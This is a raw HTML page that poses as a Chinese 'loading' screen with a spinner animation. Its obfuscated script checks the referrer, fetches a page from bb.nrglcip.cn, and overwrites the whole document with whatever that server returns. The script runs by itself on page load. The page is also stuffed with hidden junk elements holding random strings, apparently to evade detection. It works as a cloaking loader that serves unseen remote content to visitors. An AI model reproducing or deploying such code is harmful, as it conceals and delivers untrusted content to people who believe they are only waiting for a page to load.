<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .eTaACRZru {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .eTaACRZru .MJLf6yMkJrc {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .eTaACRZru .content {
            line-height: 50px;
            text-align: center
        }

        .eTaACRZru .img {
            width: 100%
        }

        .eTaACRZru .dZezAPmmrBB {
            text-align: center
        }

        .eTaACRZru .dZezAPmmrBB span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .eTaACRZru .dZezAPmmrBB span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .eTaACRZru .dZezAPmmrBB span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .eTaACRZru .dZezAPmmrBB span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .eTaACRZru .dZezAPmmrBB span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .eTaACRZru .dZezAPmmrBB span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .eTaACRZru .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Qn1l8JZ7Y8HRK(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var unqKtkm = Qn1l8JZ7Y8HRK('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ unqKtkm +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ unqKtkm +".html?a=share";
		}
		
        hPtqczWX=url+"#"+new Date().getTime();
        hPtqczWX && function() {
            $.get(hPtqczWX, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>m3JO1yuQjNPj0Yi9yKAbSGbtwTCJyvOxIcOh36zjBR0wjBSq8arUnGNfjUTHv1zyB72fcXJOzllASY0R</span>
<a  href='#' style='display:none'>WhURkzv4GWOEm8fKeOHhPg7Y2N6HrxPJ99yqcf5E0V59feBDPl3jiuAO5i378pd8H9ATUu3cXNKc</a>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>WhURkzv4GWOEm8fKeOHhPg7Y2N6HrxPJ99yqcf5E0V59feBDPl3jiuAO5i378pd8H9ATUu3cXNKc</a>
<img  src='' style='display:none'>
<span style='display:none'>m3JO1yuQjNPj0Yi9yKAbSGbtwTCJyvOxIcOh36zjBR0wjBSq8arUnGNfjUTHv1zyB72fcXJOzllASY0R</span>
<a  href='#' style='display:none'>WhURkzv4GWOEm8fKeOHhPg7Y2N6HrxPJ99yqcf5E0V59feBDPl3jiuAO5i378pd8H9ATUu3cXNKc</a>
<span style='display:none'>m3JO1yuQjNPj0Yi9yKAbSGbtwTCJyvOxIcOh36zjBR0wjBSq8arUnGNfjUTHv1zyB72fcXJOzllASY0R</span><div class="eTaACRZru">
    <div class="MJLf6yMkJrc">
        <div class="dZezAPmmrBB">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>DeKD6WfIlkLDRhS2m3ofXBy4f9WwIdEeIC4biBGBiWKC5D328ADVAWbF1zD43MUdInI7N2ch9PsZKYSIu</span>
<p  style='display:none'>ASwVtxhOcrFk</p>
<span style='display:none'>DeKD6WfIlkLDRhS2m3ofXBy4f9WwIdEeIC4biBGBiWKC5D328ADVAWbF1zD43MUdInI7N2ch9PsZKYSIu</span>
<h1 style='display:none' >IhLgZJmVNbYwjhOyGcPzaijCxJONXbwLJlEfNIjn8euuqPQTIJ2m8l</h1></body>
</html>